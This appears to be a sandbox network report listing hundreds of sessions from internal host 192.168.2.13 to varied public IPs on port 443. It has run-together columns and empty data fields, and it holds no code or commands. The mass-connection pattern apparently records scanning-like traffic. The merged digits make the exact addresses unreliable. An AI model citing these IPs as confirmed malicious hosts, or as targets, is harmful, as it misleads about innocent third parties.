                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13072192.168.2.1347504221.61.98.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13073192.168.2.1338992188.249.117.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13074192.168.2.1337636114.34.0.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13075192.168.2.134133468.162.231.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13076192.168.2.133422092.219.49.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13077192.168.2.134592613.121.200.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13078192.168.2.1338376202.82.250.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13079192.168.2.135268254.32.169.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13080192.168.2.1353130175.43.31.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13081192.168.2.1338026123.142.49.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13082192.168.2.1338952181.72.90.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13083192.168.2.133487435.36.55.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13084192.168.2.134739847.109.168.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13085192.168.2.134539420.94.156.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13086192.168.2.1342126208.164.37.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13087192.168.2.1360456124.171.231.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13088192.168.2.1340420153.97.238.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13089192.168.2.134234092.75.61.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13090192.168.2.134902636.133.255.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13091192.168.2.135794687.79.28.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13092192.168.2.1334792129.28.168.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13093192.168.2.1340598140.252.225.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13094192.168.2.1338924121.200.8.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13095192.168.2.1356276123.77.166.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13096192.168.2.133471673.177.181.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13097192.168.2.1337730196.255.104.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13098192.168.2.133324644.10.88.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13099192.168.2.13539604.38.15.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13100192.168.2.1348694125.250.153.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13101192.168.2.134337048.133.114.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13102192.168.2.1343034100.7.181.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13103192.168.2.134946658.255.222.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13104192.168.2.1353830153.180.160.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13105192.168.2.1333270121.206.176.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13106192.168.2.1344440180.187.235.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13107192.168.2.1359742223.253.248.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13108192.168.2.1359358201.76.51.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13109192.168.2.1342824202.217.195.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13110192.168.2.1347734157.28.24.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13111192.168.2.1345120139.17.170.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13112192.168.2.1344502105.254.184.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13113192.168.2.1346736170.85.151.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13114192.168.2.1334062212.250.191.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13115192.168.2.1359898185.240.127.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13116192.168.2.1334474105.156.76.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13117192.168.2.1347040142.187.8.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13118192.168.2.1341696169.231.174.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13119192.168.2.1357664180.228.127.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13120192.168.2.135782287.33.170.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13121192.168.2.135323689.171.169.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13122192.168.2.1340448152.227.147.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13123192.168.2.134612071.18.21.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13124192.168.2.1352874185.74.217.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13125192.168.2.1360502122.212.75.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13126192.168.2.136088094.157.233.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13127192.168.2.1348170202.79.18.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13128192.168.2.1347564169.126.127.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13129192.168.2.1336192154.118.16.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13130192.168.2.1351926157.113.184.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13131192.168.2.1344714130.148.101.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13132192.168.2.1342682168.141.132.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13133192.168.2.1355842188.6.86.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13134192.168.2.133434648.50.110.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13135192.168.2.136067874.94.98.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13136192.168.2.135070889.78.184.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13137192.168.2.1341512150.182.56.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13138192.168.2.1360218220.189.219.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13139192.168.2.134166692.73.45.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13140192.168.2.133782293.139.0.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13141192.168.2.1345356154.1.245.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13142192.168.2.1344820107.58.113.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13143192.168.2.1350110156.26.236.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13144192.168.2.1339532104.163.202.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13145192.168.2.1347354142.120.188.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13146192.168.2.1350540155.186.60.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13147192.168.2.1349110169.224.166.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13148192.168.2.1343656193.40.136.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13149192.168.2.1341232172.198.237.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13150192.168.2.1345722209.124.49.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13151192.168.2.1359054154.29.133.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13152192.168.2.1348696111.124.114.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13153192.168.2.1346156211.39.168.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13154192.168.2.135761269.133.188.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13155192.168.2.135893648.58.117.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13156192.168.2.135277854.191.183.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13157192.168.2.1357404195.89.178.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13158192.168.2.1357224134.8.51.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13159192.168.2.133801813.118.64.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13160192.168.2.133480624.237.103.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13161192.168.2.1350184137.34.41.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13162192.168.2.1344862136.168.111.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13163192.168.2.1339868117.106.135.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13164192.168.2.1353324179.78.126.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13165192.168.2.134245079.51.29.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13166192.168.2.1336362216.130.36.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13167192.168.2.134944431.1.220.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13168192.168.2.135143677.237.166.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13169192.168.2.13568304.47.200.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13170192.168.2.133308045.160.200.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13171192.168.2.135931653.198.200.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13172192.168.2.1359036133.8.156.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13173192.168.2.1333624154.196.185.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13174192.168.2.1342122101.191.206.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13175192.168.2.1349522161.209.27.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13176192.168.2.134598013.107.0.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13177192.168.2.135272491.160.0.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13178192.168.2.1336612199.191.212.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13179192.168.2.1355164151.47.252.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13180192.168.2.133710858.72.82.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13181192.168.2.1356358126.153.102.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13182192.168.2.1335170184.97.167.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13183192.168.2.1343832117.134.165.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13184192.168.2.135708665.198.72.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13185192.168.2.1357804129.231.94.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13186192.168.2.13455928.182.171.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13187192.168.2.1342106182.212.41.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13188192.168.2.13532302.134.195.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13189192.168.2.133789697.92.169.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13190192.168.2.1359568104.138.79.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13191192.168.2.1343812154.253.98.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13192192.168.2.1348338135.89.124.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13193192.168.2.135543834.41.82.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13194192.168.2.1352744143.126.5.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13195192.168.2.1360178157.149.36.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13196192.168.2.135075692.186.57.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13197192.168.2.1349508163.42.79.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13198192.168.2.134828217.186.14.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13199192.168.2.1349736169.35.47.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13200192.168.2.1352194115.164.248.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13201192.168.2.1340004190.240.224.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13202192.168.2.134815660.236.37.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13203192.168.2.1350224186.53.93.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13204192.168.2.13513864.159.135.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13205192.168.2.1341790195.70.224.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13206192.168.2.1350520158.197.66.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13207192.168.2.1333062144.172.83.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13208192.168.2.1357564195.184.147.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13209192.168.2.1337454196.252.37.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13210192.168.2.1359506152.247.174.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13211192.168.2.1358240107.147.193.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13212192.168.2.1340796151.23.129.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13213192.168.2.133423889.216.119.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13214192.168.2.133313659.130.159.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13215192.168.2.135437273.55.131.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13216192.168.2.1355002192.28.195.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13217192.168.2.1342710148.28.27.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13218192.168.2.1359872147.219.10.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13219192.168.2.1352720174.242.252.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13220192.168.2.1336104201.225.64.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13221192.168.2.13500424.164.255.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13222192.168.2.1349864172.191.18.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13223192.168.2.1356236163.236.238.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13224192.168.2.1359900138.37.84.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13225192.168.2.1358620111.223.194.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13226192.168.2.1338072189.55.153.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13227192.168.2.1341336158.142.225.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13228192.168.2.134033266.55.83.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13229192.168.2.133826019.96.19.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13230192.168.2.13504982.158.33.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13231192.168.2.1337086204.16.211.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13232192.168.2.1345798170.189.72.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13233192.168.2.133289448.207.123.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13234192.168.2.134819297.154.89.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13235192.168.2.133619893.37.230.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13236192.168.2.133807071.173.186.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13237192.168.2.135995213.199.26.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13238192.168.2.1339474111.142.229.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13239192.168.2.1353178211.81.21.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13240192.168.2.1343150170.134.162.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13241192.168.2.1343576192.129.53.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13242192.168.2.1356984110.11.239.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13243192.168.2.134702634.56.66.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13244192.168.2.135201642.51.170.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13245192.168.2.1338206101.40.100.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13246192.168.2.1342810134.49.246.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13247192.168.2.1344598121.104.115.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13248192.168.2.1358526185.209.132.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13249192.168.2.1332776196.76.138.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13250192.168.2.1352542191.89.17.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13251192.168.2.135752496.167.200.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13252192.168.2.135225286.80.116.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13253192.168.2.1353368201.192.19.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13254192.168.2.1340308211.138.144.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13255192.168.2.1350492188.250.55.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13256192.168.2.135767482.155.207.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13257192.168.2.135470874.192.45.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13258192.168.2.134840275.140.77.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13259192.168.2.1356886173.172.42.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13260192.168.2.1357054175.47.217.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13261192.168.2.134764217.22.139.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13262192.168.2.1360062222.225.195.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13263192.168.2.1345294211.250.72.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13264192.168.2.1359880109.67.24.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13265192.168.2.133536258.117.204.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13266192.168.2.135631061.180.1.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13267192.168.2.134707814.218.220.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13268192.168.2.1352684120.7.173.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13269192.168.2.133455844.56.131.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13270192.168.2.135385674.181.169.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13271192.168.2.1343394175.254.203.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13272192.168.2.1350606178.79.157.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13273192.168.2.1351944136.234.60.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13274192.168.2.134546058.169.11.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13275192.168.2.134222896.214.18.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13276192.168.2.136091047.15.197.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13277192.168.2.1357666162.69.15.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13278192.168.2.134244281.163.246.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13279192.168.2.134627623.43.205.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13280192.168.2.135145082.73.40.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13281192.168.2.1339578220.147.73.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13282192.168.2.1352130165.84.203.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13283192.168.2.135406880.4.241.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13284192.168.2.1351728178.248.122.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13285192.168.2.135790093.43.112.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13286192.168.2.1360320115.172.37.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13287192.168.2.1335480135.234.210.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13288192.168.2.1351666174.225.71.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13289192.168.2.1356128203.143.107.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13290192.168.2.1343502157.229.105.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13291192.168.2.1336392139.139.177.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13292192.168.2.1344622166.93.163.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13293192.168.2.1336970155.129.24.236443
